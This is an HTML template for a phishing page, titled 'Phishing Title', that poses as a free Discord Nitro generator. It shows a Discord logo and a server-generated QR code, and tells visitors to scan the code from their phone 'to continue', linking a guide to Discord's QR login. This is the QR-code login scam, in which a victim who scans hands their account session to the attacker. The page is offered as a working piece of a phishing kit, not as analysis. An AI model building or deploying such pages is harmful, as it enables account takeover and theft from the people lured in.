<!DOCTYPE html>

<html>
    <head>
        <header>
            <meta charset='UTF-8'>
            <meta name='description' content='Free discord nitro generator online, no downloads, no human verification !'>
            <meta name='keywords' content='Discord, Nitro, Generator, No, Human, Verification'>
            <meta charset='utf-8'>

            <title>Phishing Title</title>
        </header>
    </head>

    <body>
        <div class= 'logo_top' style='width:800px; margin:0 auto;'>
            <img src='https://media.discordapp.net/attachments/896814156139888660/897894207665102898/1499537505a4dedb975abae446f94535ca28a3b3a3.png'>
        </div>
        
        <div class='qr_code' style='width:370px; margin:0 auto;'>
            <a id='text_lmao'>Scan the code from your phone to continue!</a>
            <br><br>
            <img src='<%= qr_code_path %>'/>
            <br><br>
            <a target="_blank" rel="noopener noreferrer" id='url' href='https://techswift.org/2020/10/06/how-to-login-to-discord-via-qr-code/'>How to scan qr code ?</a>
        </div>
    </body>

    <style>
        html {
            background-color: rgb(27, 29, 29);
            background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Solid_blue.svg/225px-Solid_blue.svg.png');
        }

        .logo_top {
            text-align: middle;
        }

        .qr_code {
            box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
            background-color: #23272A;
            border-radius: 5px;
            transition: 0.5s;
            

            padding: 15px;

            vertical-align:middle;
            text-align:center;
        }

        .qr_code:hover {
            box-shadow: 0 8px 32px 0 rgba(0,0,0,0.4);
        }

        #url {
            font-size: medium;
            font-family:Georgia, 'Times New Roman', Times, serif;
            color: #6a747c;
        }

        #text_lmao {
            font-size:large;
            font-family:Verdana, Geneva, Tahoma, sans-serif;
            color: #6a747c;
        }
    </style>
</html>